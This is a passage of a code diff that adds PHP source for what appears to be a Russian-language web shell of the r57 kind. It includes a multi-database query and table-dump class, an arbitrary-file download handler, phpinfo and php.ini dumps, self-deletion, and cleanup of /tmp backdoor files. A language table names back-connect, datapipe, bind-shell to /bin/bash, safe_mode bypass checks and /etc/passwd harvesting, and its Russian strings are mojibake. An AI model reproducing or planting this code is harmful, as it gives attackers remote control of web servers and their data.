+ if(false===($this->res=@pg_query($this->connection,$query)))
+ {
+ $this->error = @pg_last_error($this->connection);
+ return 0;
+ }
+ else if(@pg_num_rows($this->res) > 0) { return 1; }
+ return 2;
+ break;
+ case 'Oracle':
+ if(false===($this->res=@ociparse($this->connection,$query)))
+ {
+ $this->error = 'Query parse error';
+ }
+ else
+ {
+
if(@ociexecute($this->res))
+ {
+ if(@ocirowcount($this->res) != 0) return 2;
+ return 1;
+ }
+ $error = @ocierror();
+ $this->error=$error['message'];
+ }
+ break;
+ }
+ return 0;
+ }
+ function get_result()
+ {
+ $this->rows=array();
+ $this->columns=array();
+ $this->num_rows=$this->num_fields=0;
+ switch($this->db)
+ {
+ case 'MySQL':
+ $this->num_rows=@mysql_num_rows($this->res);
+ $this->num_fields=@mysql_num_fields($this->res);
+ while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
+ @mysql_free_result($this->res);
+ if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+ break;
+ case 'MSSQL':
+ $this->num_rows=@mssql_num_rows($this->res);
+ $this->num_fields=@mssql_num_fields($this->res);
+ while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
+ @mssql_free_result($this->res);
+ if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
+ break;
+ case 'PostgreSQL':
+ $this->num_rows=@pg_num_rows($this->res);
+ $this->num_fields=@pg_num_fields($this->res);
+ while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
+ @pg_free_result($this->res);
+ if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+ break;
+ case 'Oracle':
+ $this->num_fields=@ocinumcols($this->res);
+ while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
+ @ocifreestatement($this->res);
+ if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+ break;
+ }
+ return 0;
+ }
+ function dump($table)
+ {
+ if(empty($table)) return 0;
+ $this->dump=array();
+ $this->dump[0] = '##';
+ $this->dump[1] = '## --------------------------------------- ';
+ $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s");
+ $this->dump[3] = '## Database: '.$this->base;
+ $this->dump[4] = '## Table: '.$table;
+ $this->dump[5] = '## --------------------------------------- ';
+ switch($this->db)
+ {
+ case 'MySQL':
+ $this->dump[0] = '## MySQL dump';
+
if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
+ if(!$this->get_result()) return 0;
+ $this->dump[] = $this->rows[0]['Create Table'];
+ $this->dump[] = '## --------------------------------------- ';
+ if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
+ if(!$this->get_result()) return 0;
+ for($i=0;$i<$this->num_rows;$i++)
+ {
+ foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
+ $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+ }
+ break;
+ case 'MSSQL':
+ $this->dump[0] = '## MSSQL dump';
+ if($this->query('SELECT * FROM '.$table)!=1) return 0;
+ if(!$this->get_result()) return 0;
+ for($i=0;$i<$this->num_rows;$i++)
+ {
+ foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
+ $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+ }
+ break;
+ case 'PostgreSQL':
+ $this->dump[0] = '## PostgreSQL dump';
+ if($this->query('SELECT * FROM '.$table)!=1) return 0;
+ if(!$this->get_result()) return 0;
+ for($i=0;$i<$this->num_rows;$i++)
+ {
+ foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
+ $this->dump[] = 'INSERT INTO '.$table.'
('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+ }
+ break;
+ case 'Oracle':
+ $this->dump[0] = '## ORACLE dump';
+ $this->dump[] = '## under construction';
+ break;
+ default:
+ return 0;
+ break;
+ }
+ return 1;
+ }
+ function close()
+ {
+ switch($this->db)
+ {
+ case 'MySQL':
+ @mysql_close($this->connection);
+ break;
+ case 'MSSQL':
+ @mssql_close($this->connection);
+ break;
+ case 'PostgreSQL':
+ @pg_close($this->connection);
+ break;
+ case 'Oracle':
+ @oci_close($this->connection);
+ break;
+ }
+ }
+ function affected_rows()
+ {
+ switch($this->db)
+ {
+ case 'MySQL':
+ return @mysql_affected_rows($this->res);
+ break;
+ case 'MSSQL':
+ return @mssql_affected_rows($this->res);
+ break;
+ case 'PostgreSQL':
+ return @pg_affected_rows($this->res);
+ break;
+ case 'Oracle':
+ return @ocirowcount($this->res);
+ break;
+ default:
+ return 0;
+ break;
+ }
+ }
+ }
+if(isset($_GET['img'])&&!empty($_GET['img']))
+ {
+ $images = array();
+ $images[1]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI9pkODnYohUhQIAOw==';
+ $images[2]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI+pwA3hnmlJhgIAOw==';
+ @ob_clean();
+ header("Content-type: image/gif");
+ echo base64_decode($images[$_GET['img']]);
+ die();
+ }
+if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
+ {
+ if(!$file=@fopen($_POST['d_name'],"r")) { echo re($_POST['d_name']); $_POST['cmd']=""; }
+ else
+ {
+ @ob_clean();
+ $filename = @basename($_POST['d_name']);
+ $filedump = @fread($file,@filesize($_POST['d_name']));
+ fclose($file);
+ $content_encoding=$mime_type='';
+ compress($filename,$filedump,$_POST['compress']);
+ if (!empty($content_encoding)) { header('Content-Encoding: ' .
$content_encoding); }
+ header("Content-type: ".$mime_type);
+ header("Content-disposition: attachment; filename=\"".$filename."\";");
+ echo $filedump;
+ exit();
+ }
+ }
+if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
+if ($_POST['cmd']=="db_query")
+ {
+ echo $head;
+ $sql = new my_sql();
+ $sql->db = $_POST['db'];
+ $sql->host = $_POST['db_server'];
+ $sql->port = $_POST['db_port'];
+ $sql->user = $_POST['mysql_l'];
+ $sql->pass = $_POST['mysql_p'];
+ $sql->base = $_POST['mysql_db'];
+ $querys = @explode(';',$_POST['db_query']);
+
+ if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
+ else
+ {
+ if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>";
+ else
+ {
+ foreach($querys as $num=>$query)
+ {
+ if(strlen($query)>5)
+ {
+ echo "<font face=Verdana size=-2 color=green><b>Query#".$num."
: ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
+ switch($sql->query($query))
+ {
+ case '0':
+ echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
+ break;
+ case '1':
+ if($sql->get_result())
+ {
+ echo "<table width=100%>";
+ foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
+ $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", $sql->columns);
+ echo "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+ for($i=0;$i<$sql->num_rows;$i++)
+ {
+ foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
+ $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]);
+ echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>';
+ }
+ echo "</table>";
+ }
+ break;
+ case '2':
+ $ar = $sql->affected_rows()?($sql->affected_rows()):('0');
+ echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
+ break;
+ }
+ }
+ }
+ }
+ }
+ echo "<br><form name=form method=POST>";
+ echo in('hidden','db',0,$_POST['db']);
+ echo in('hidden','db_server',0,$_POST['db_server']);
+ echo in('hidden','db_port',0,$_POST['db_port']);
+ echo in('hidden','mysql_l',0,$_POST['mysql_l']);
+ echo in('hidden','mysql_p',0,$_POST['mysql_p']);
+ echo in('hidden','mysql_db',0,$_POST['mysql_db']);
+ echo in('hidden','cmd',0,'db_query');
+ echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
+ echo "</form>";
+ echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
+ }
+if(isset($_GET['delete']))
+ {
+ @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));
+ }
+if(isset($_GET['tmp']))
+ {
+ @unlink("/tmp/bdpl");
+ @unlink("/tmp/back");
+ @unlink("/tmp/bd");
+ @unlink("/tmp/bd.c");
+ @unlink("/tmp/dp");
+ @unlink("/tmp/dpc");
+ @unlink("/tmp/dpc.c");
+ }
+if(isset($_GET['phpini']))
+{
+echo $head;
+function U_value($value)
+ {
+ if ($value == '') return '<i>no value</i>';
+ if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
+ if ($value === null) return 'NULL';
+ if (@is_object($value)) $value = (array) $value;
+ if (@is_array($value))
+ {
+ @ob_start();
+ print_r($value);
+ $value = @ob_get_contents();
+ @ob_end_clean();
+ }
+ return U_wordwrap((string) $value);
+ }
+function U_wordwrap($str)
+ {
+ $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
+ return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
+ }
+if (@function_exists('ini_get_all'))
+ {
+ $r = '';
+ echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
+ foreach (@ini_get_all() as $key=>$value)
+ {
+ $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
+ }
+ echo $r;
+ echo '</table>';
+ }
+echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+die();
+}
+if(isset($_GET['cpu']))
+ {
+ echo $head;
+ echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2
color=red><b>CPU</b></font></div></td></tr></table><table width=100%>'; + $cpuf = @file("cpuinfo"); + if($cpuf) + { + $c = @sizeof($cpuf); + for($i=0;$i<$c;$i++) + { + $info = @explode(":",$cpuf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +if(isset($_GET['mem'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>'; + $memf = @file("meminfo"); + if($memf) + { + $c = sizeof($memf); + for($i=0;$i<$c;$i++) + { + $info = explode(":",$memf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +$lang=array( +'ru_text1' =>'أ‚أ»أ¯أ®أ«أ­أ¥أ­أ­أ أ؟ أھأ®أ¬أ أ­أ¤أ ', +'ru_text2' =>'أ‚أ»أ¯أ®أ«أ­أ¥أ­أ¨أ¥ أھأ®أ¬أ أ­أ¤ أ­أ  أ±أ¥أ°أ¢أ¥أ°أ¥', +'ru_text3' =>'أ‚أ»أ¯أ®أ«أ­أ¨أ²أ¼ أھأ®أ¬أ أ­أ¤أ³', +'ru_text4' =>'أگأ أ،أ®أ·أ أ؟ أ¤أ¨أ°أ¥أھأ²أ®أ°أ¨أ؟', +'ru_text5' =>'أ‡أ أ£أ°أ³أ§أھأ  أ´أ أ©أ«أ®أ¢ أ­أ  أ±أ¥أ°أ¢أ¥أ°', +'ru_text6' =>'أ‹أ®أھأ أ«أ¼أ­أ»أ© أ´أ أ©أ«', +'ru_text7' =>'أ€أ«أ¨أ أ±أ»', +'ru_text8' 
=>'أ‚أ»أ،أ¥أ°أ¨أ²أ¥ أ أ«أ¨أ أ±', +'ru_butt1' =>'أ‚أ»أ¯أ®أ«أ­أ¨أ²أ¼', +'ru_butt2' =>'أ‡أ أ£أ°أ³أ§أ¨أ²أ¼', +'ru_text9' =>'أژأ²أھأ°أ»أ²أ¨أ¥ أ¯أ®أ°أ²أ  أ¨ أ¯أ°أ¨أ¢أ؟أ§أھأ  أ¥أ£أ® أھ /bin/bash', +'ru_text10'=>'أژأ²أھأ°أ»أ²أ¼ أ¯أ®أ°أ²', +'ru_text11'=>'أڈأ أ°أ®أ«أ¼ أ¤أ«أ؟ أ¤أ®أ±أ²أ³أ¯أ ', +'ru_butt3' =>'أژأ²أھأ°أ»أ²أ¼', +'ru_text12'=>'back-connect', +'ru_text13'=>'IP-أ أ¤أ°أ¥أ±', +'ru_text14'=>'أڈأ®أ°أ²', +'ru_butt4' =>'أ‚أ»أ¯أ®أ«أ­أ¨أ²أ¼', +'ru_text15'=>'أ‡أ أ£أ°أ³أ§أھأ  أ´أ أ©أ«أ®أ¢ أ± أ³أ¤أ أ«أ¥أ­أ­أ®أ£أ® أ±أ¥أ°أ¢أ¥أ°أ ', +'ru_text16'=>'أˆأ±أ¯أ®أ«أ¼أ§أ®أ¢أ أ²أ¼', +'ru_text17'=>'أ“أ¤أ أ«أ¥أ­أ­أ»أ© أ´أ أ©أ«', +'ru_text18'=>'أ‹أ®أھأ أ«أ¼أ­أ»أ© أ´أ أ©أ«', +'ru_text19'=>'Exploits', +'ru_text20'=>'أˆأ±أ¯أ®أ«أ¼أ§أ®أ¢أ أ²أ¼', +'ru_text21'=>'أچأ®أ¢أ®أ¥ أ¨أ¬أ؟', +'ru_text22'=>'datapipe', +'ru_text23'=>'أ‹أ®أھأ أ«أ¼أ­أ»أ© أ¯أ®أ°أ²', +'ru_text24'=>'أ“أ¤أ أ«أ¥أ­أ­أ»أ© أµأ®أ±أ²', +'ru_text25'=>'أ“أ¤أ أ«أ¥أ­أ­أ»أ© أ¯أ®أ°أ²', +'ru_text26'=>'أˆأ±أ¯أ®أ«أ¼أ§أ®أ¢أ أ²أ¼', +'ru_butt5' =>'أ‡أ أ¯أ³أ±أ²أ¨أ²أ¼', +'ru_text28'=>'أگأ أ،أ®أ²أ  أ¢ safe_mode', +'ru_text29'=>'أ„أ®أ±أ²أ³أ¯ أ§أ أ¯أ°أ¥أ¹أ¥أ­', +'ru_butt6' =>'أ‘أ¬أ¥أ­أ¨أ²أ¼', +'ru_text30'=>'أڈأ°أ®أ±أ¬أ®أ²أ° أ´أ أ©أ«أ ', +'ru_butt7' =>'أ‚أ»أ¢أ¥أ±أ²أ¨', +'ru_text31'=>'أ”أ أ©أ« أ­أ¥ أ­أ أ©أ¤أ¥أ­', +'ru_text32'=>'أ‚أ»أ¯أ®أ«أ­أ¥أ­أ¨أ¥ PHP أھأ®أ¤أ ', +'ru_text33'=>'أڈأ°أ®أ¢أ¥أ°أھأ  أ¢أ®أ§أ¬أ®أ¦أ­أ®أ±أ²أ¨ أ®أ،أµأ®أ¤أ  أ®أ£أ°أ أ­أ¨أ·أ¥أ­أ¨أ© open_basedir أ·أ¥أ°أ¥أ§ أ´أ³أ­أھأ¶أ¨أ¨ cURL', +'ru_butt8' =>'أڈأ°أ®أ¢أ¥أ°أ¨أ²أ¼', +'ru_text34'=>'أڈأ°أ®أ¢أ¥أ°أھأ  أ¢أ®أ§أ¬أ®أ¦أ­أ®أ±أ²أ¨ أ®أ،أµأ®أ¤أ  أ®أ£أ°أ أ­أ¨أ·أ¥أ­أ¨أ© safe_mode أ·أ¥أ°أ¥أ§ أ´أ³أ­أھأ¶أ¨أ¾ include', +'ru_text35'=>'أڈأ°أ®أ¢أ¥أ°أھأ  أ¢أ®أ§أ¬أ®أ¦أ­أ®أ±أ²أ¨ أ®أ،أµأ®أ¤أ  أ®أ£أ°أ أ­أ¨أ·أ¥أ­أ¨أ© safe_mode أ·أ¥أ°أ¥أ§ أ§أ أ£أ°أ³أ§أھأ³ أ´أ أ©أ«أ  أ¢ mysql', +'ru_text36'=>'أپأ أ§أ  . 
أ’أ أ،أ«أ¨أ¶أ ', +'ru_text37'=>'أ‹أ®أ£أ¨أ­', +'ru_text38'=>'أڈأ أ°أ®أ«أ¼', +'ru_text39'=>'أپأ أ§أ ', +'ru_text40'=>'أ„أ أ¬أ¯ أ²أ أ،أ«أ¨أ¶أ» أ،أ أ§أ» أ¤أ أ­أ­أ»أµ', +'ru_butt9' =>'أ„أ أ¬أ¯', +'ru_text41'=>'أ‘أ®أµأ°أ أ­أ¨أ²أ¼ أ¢ أ´أ أ©أ«أ¥', +'ru_text42'=>'أگأ¥أ¤أ أھأ²أ¨أ°أ®أ¢أ أ­أ¨أ¥ أ´أ أ©أ«أ ', +'ru_text43'=>'أگأ¥أ¤أ أھأ²أ¨أ°أ®أ¢أ أ²أ¼ أ´أ أ©أ«', +'ru_butt10'=>'أ‘أ®أµأ°أ أ­أ¨أ²أ¼', +'ru_butt11'=>'أگأ¥أ¤أ أھأ²أ¨أ°أ®أ¢أ أ²أ¼', +'ru_text44'=>'أگأ¥أ¤أ أھأ²أ¨أ°أ®أ¢أ أ­أ¨أ¥ أ´أ أ©أ«أ  أ­أ¥أ¢أ®أ§أ¬أ®أ¦أ­أ®! أ„أ®أ±أ²أ³أ¯ أ²أ®أ«أ¼أھأ® أ¤أ«أ؟ أ·أ²أ¥أ­أ¨أ؟!', +'ru_text45'=>'أ”أ أ©أ« أ±أ®أµأ°أ أ­أ¥أ­', +'ru_text46'=>'أڈأ°أ®أ±أ¬أ®أ²أ° phpinfo()', +'ru_text47'=>'أڈأ°أ®أ±أ¬أ®أ²أ° أ­أ أ±أ²أ°أ®أ¥أھ php.ini', +'ru_text48'=>'أ“أ¤أ أ«أ¥أ­أ¨أ¥ أ¢أ°أ¥أ¬أ¥أ­أ­أ»أµ أ´أ أ©أ«أ®أ¢', +'ru_text49'=>'أ“أ¤أ أ«أ¥أ­أ¨أ¥ أ±أھأ°أ¨أ¯أ²أ  أ± أ±أ¥أ°أ¢أ¥أ°أ ', +'ru_text50'=>'أˆأ­أ´أ®أ°أ¬أ أ¶أ¨أ؟ أ® أ¯أ°أ®أ¶أ¥أ±أ±أ®أ°أ¥', +'ru_text51'=>'أˆأ­أ´أ®أ°أ¬أ أ¶أ¨أ؟ أ® أ¯أ أ¬أ؟أ²أ¨', +'ru_text52'=>'أ’أ¥أھأ±أ² أ¤أ«أ؟ أ¯أ®أ¨أ±أھأ ', +'ru_text53'=>'أˆأ±أھأ أ²أ¼ أ¢ أ¯أ أ¯أھأ¥', +'ru_text54'=>'أڈأ®أ¨أ±أھ أ²أ¥أھأ±أ²أ  أ¢ أ´أ أ©أ«أ أµ', +'ru_butt12'=>'أچأ أ©أ²أ¨', +'ru_text55'=>'أ’أ®أ«أ¼أھأ® أ¢ أ´أ أ©أ«أ أµ', +'ru_text56'=>'أچأ¨أ·أ¥أ£أ® أ­أ¥ أ­أ أ©أ¤أ¥أ­أ®', +'ru_text57'=>'أ‘أ®أ§أ¤أ أ²أ¼/أ“أ¤أ أ«أ¨أ²أ¼ أ”أ أ©أ«/أ„أ¨أ°أ¥أھأ²أ®أ°أ¨أ¾', +'ru_text58'=>'أˆأ¬أ؟', +'ru_text59'=>'أ”أ أ©أ«', +'ru_text60'=>'أ„أ¨أ°أ¥أھأ²أ®أ°أ¨أ¾', +'ru_butt13'=>'أ‘أ®أ§أ¤أ أ²أ¼/أ“أ¤أ أ«أ¨أ²أ¼', +'ru_text61'=>'أ”أ أ©أ« أ±أ®أ§أ¤أ أ­', +'ru_text62'=>'أ„أ¨أ°أ¥أھأ²أ®أ°أ¨أ؟ أ±أ®أ§أ¤أ أ­أ ', +'ru_text63'=>'أ”أ أ©أ« أ³أ¤أ أ«أ¥أ­', +'ru_text64'=>'أ„أ¨أ°أ¥أھأ²أ®أ°أ¨أ؟ أ³أ¤أ أ«أ¥أ­أ ', +'ru_text65'=>'أ‘أ®أ§أ¤أ أ²أ¼', +'ru_text66'=>'أ“أ¤أ أ«أ¨أ²أ¼', +'ru_text67'=>'Chown/Chgrp/Chmod', +'ru_text68'=>'أٹأ®أ¬أ أ­أ¤أ ', +'ru_text69'=>'أڈأ أ°أ أ¬أ¥أ²أ°1', +'ru_text70'=>'أڈأ أ°أ أ¬أ¥أ²أ°2', +'ru_text71'=>"أ‚أ²أ®أ°أ®أ© أ¯أ أ°أ أ¬أ¥أ²أ° أھأ®أ¬أ أ­أ¤أ»:\r\n- أ¤أ«أ؟ CHOWN - أ¨أ¬أ؟ أ­أ®أ¢أ®أ£أ® أ¯أ®أ«أ¼أ§أ®أ¢أ أ²أ¥أ«أ؟ أ¨أ«أ¨ أ¥أ£أ® UID (أ·أ¨أ±أ«أ®أ¬) \r\n- أ¤أ«أ؟ 
أھأ®أ¬أ أ­أ¤أ» CHGRP - أ¨أ¬أ؟ أ£أ°أ³أ¯أ¯أ» أ¨أ«أ¨ GID (أ·أ¨أ±أ«أ®أ¬) \r\n- أ¤أ«أ؟ أھأ®أ¬أ أ­أ¤أ» CHMOD - أ¶أ¥أ«أ®أ¥ أ·أ¨أ±أ«أ® أ¢ أ¢أ®أ±أ¼أ¬أ¥أ°أ¨أ·أ­أ®أ¬ أ¯أ°أ¥أ¤أ±أ²أ أ¢أ«أ¥أ­أ¨أ¨ (أ­أ أ¯أ°أ¨أ¬أ¥أ° 0777)", +'ru_text72'=>'أ’أ¥أھأ±أ² أ¤أ«أ؟ أ¯أ®أ¨أ±أھأ ', +'ru_text73'=>'أˆأ±أھأ أ²أ¼ أ¢ أ¯أ أ¯أھأ¥', +'ru_text74'=>'أˆأ±أھأ أ²أ¼ أ¢ أ´أ أ©أ«أ أµ', +'ru_text75'=>'* أ¬أ®أ¦أ­أ® أ¨أ±أ¯أ®أ«أ¼أ§أ®أ¢أ أ²أ¼ أ°أ¥أ£أ³أ«أ؟أ°أ­أ®أ¥ أ¢أ»أ°أ أ¦أ¥أ­أ¨أ¥', +'ru_text76'=>'أڈأ®أ¨أ±أھ أ²أ¥أھأ±أ²أ  أ¢ أ´أ أ©أ«أ أµ أ± أ¯أ®أ¬أ®أ¹أ¼أ¾ أ³أ²أ¨أ«أ¨أ²أ» find', +'ru_text80'=>'أ’أ¨أ¯', +'ru_text81'=>'أ‘أ¥أ²أ¼', +'ru_text82'=>'أپأ أ§أ» أ¤أ أ­أ­أ»أµ', +'ru_text83'=>'أ‚أ»أ¯أ®أ«أ­أ¥أ­أ¨أ¥ SQL أ§أ أ¯أ°أ®أ±أ ', +'ru_text84'=>'SQL أ§أ أ¯أ°أ®أ±', +'ru_text85'=>'أڈأ°أ®أ¢أ¥أ°أھأ  أ¢أ®أ§أ¬أ®أ¦أ­أ®أ±أ²أ¨ أ®أ،أµأ®أ¤أ  أ®أ£أ°أ أ­أ¨أ·أ¥أ­أ¨أ© safe_mode أ·أ¥أ°أ¥أ§ أ¢أ»أ¯أ®أ«أ­أ¥أ­أ¨أ¥ أھأ®أ¬أ أ­أ¤ أ¢ MSSQL أ±أ¥أ°أ¢أ¥أ°أ¥', +'ru_text86'=>'أ‘أھأ أ·أ¨أ¢أ أ­أ¨أ¥ أ´أ أ©أ«أ  أ± أ±أ¥أ°أ¢أ¥أ°أ ', +'ru_butt14'=>'أ‘أھأ أ·أ أ²أ¼', +'ru_text87'=>'أ‘أھأ أ·أ¨أ¢أ أ­أ¨أ¥ أ´أ أ©أ«أ®أ¢ أ± أ³أ¤أ أ«أ¥أ­أ­أ®أ£أ® ftp-أ±أ¥أ°أ¢أ¥أ°أ ', +'ru_text88'=>'FTP-أ±أ¥أ°أ¢أ¥أ°:أ¯أ®أ°أ²', +'ru_text89'=>'أ”أ أ©أ« أ­أ  ftp أ±أ¥أ°أ¢أ¥أ°أ¥', +'ru_text90'=>'أگأ¥أ¦أ¨أ¬ أ¯أ¥أ°أ¥أ¤أ أ·أ¨', +'ru_text91'=>'أ€أ°أµأ¨أ¢أ¨أ°أ®أ¢أ أ²أ¼ أ¢', +'ru_text92'=>'أ،أ¥أ§ أ أ°أµأ¨أ¢أ أ¶أ¨أ¨', +'ru_text93'=>'FTP', +'ru_text94'=>'FTP-أ،أ°أ³أ²أ´أ®أ°أ±', +'ru_text95'=>'أ‘أ¯أ¨أ±أ®أھ أ¯أ®أ«أ¼أ§أ®أ¢أ أ²أ¥أ«أ¥أ©', +'ru_text96'=>'أچأ¥ أ³أ¤أ أ«أ®أ±أ¼ أ¯أ®أ«أ³أ·أ¨أ²أ¼ أ±أ¯أ¨أ±أ®أھ أ¯أ®أ«أ¼أ§أ®أ¢أ أ²أ¥أ«أ¥أ©', +'ru_text97'=>'أڈأ°أ®أ¢أ¥أ°أ¥أ­أ® أھأ®أ¬أ،أ¨أ­أ أ¶أ¨أ©: ', +'ru_text98'=>'أ“أ¤أ أ·أ­أ»أµ أ¯أ®أ¤أھأ«أ¾أ·أ¥أ­أ¨أ©: ', +'ru_text99'=>'* أ¢ أھأ أ·أ¥أ±أ²أ¢أ¥ أ«أ®أ£أ¨أ­أ  أ¨ أ¯أ أ°أ®أ«أ؟ أ¨أ±أ¯أ®أ«أ¼أ§أ³أ¥أ²أ±أ؟ أ¨أ¬أ؟ أ¯أ®أ«أ¼أ§أ®أ¢أ أ²أ¥أ«أ؟ أ¨أ§ /etc/passwd', +'ru_text100'=>'أژأ²أ¯أ°أ أ¢أھأ  أ´أ أ©أ«أ®أ¢ أ­أ  أ³أ¤أ أ«أ¥أ­أ­أ»أ© أ´أ²أ¯ أ±أ¥أ°أ¢أ¥أ°', +'ru_text101'=>'أˆأ±أ¯أ®أ«أ¼أ§أ®أ¢أ أ²أ¼ أ²أ أھأ¦أ¥ أ¯أ¥أ°أ¥أ¢أ¥أ°أ­أ³أ²أ®أ¥ (user -> resu) أ¨أ¬أ؟ أ¯أ®أ«أ¼أ§أ®أ¢أ أ²أ¥أ«أ؟ أ¢ أھأ 
أ·أ¥أ±أ²أ¢أ¥ أ¯أ أ°أ®أ«أ؟', +'ru_text102'=>'أڈأ®أ·أ²أ ', +'ru_text103'=>'أژأ²أ¯أ°أ أ¢أھأ  أ¯أ¨أ±أ¼أ¬أ ', +'ru_text104'=>'أژأ²أ¯أ°أ أ¢أھأ  أ´أ أ©أ«أ  أ­أ  أ¯أ®أ·أ²أ®أ¢أ»أ© أ؟أ¹أ¨أھ', +'ru_text105'=>'أٹأ®أ¬أ³', +'ru_text106'=>'أژأ²', +'ru_text107'=>'أ’أ¥أ¬أ ', +'ru_butt15'=>'أژأ²أ¯أ°أ أ¢أ¨أ²أ¼', +'ru_text108'=>'أ’أ¥أھأ±أ² أ¯أ¨أ±أ¼أ¬أ ', +'ru_text109'=>'أ‘أ¢أ¥أ°أ­أ³أ²أ¼', +'ru_text110'=>'أگأ أ§أ¢أ¥أ°أ­أ³أ²أ¼', +'ru_text111'=>'SQL-أ‘أ¥أ°أ¢أ¥أ° : أ¯أ®أ°أ²', +'ru_text112'=>'أڈأ°أ®أ¢أ¥أ°أھأ  أ¢أ®أ§أ¬أ®أ¦أ­أ®أ±أ²أ¨ أ®أ،أµأ®أ¤أ  أ®أ£أ°أ أ­أ¨أ·أ¥أ­أ¨أ© safe_mode أ·أ¥أ°أ¥أ§ أ¨أ±أ¯أ®أ«أ¼أ§أ®أ¢أ أ­أ¨أ¥ أ´أ³أ­أھأ¶أ¨أ¨ mb_send_mail', +'ru_text113'=>'أڈأ°أ®أ¢أ¥أ°أھأ  أ¢أ®أ§أ¬أ®أ¦أ­أ®أ±أ²أ¨ أ®أ،أµأ®أ¤أ  أ®أ£أ°أ أ­أ¨أ·أ¥أ­أ¨أ© safe_mode, أ¯أ°أ®أ±أ¬أ®أ²أ° 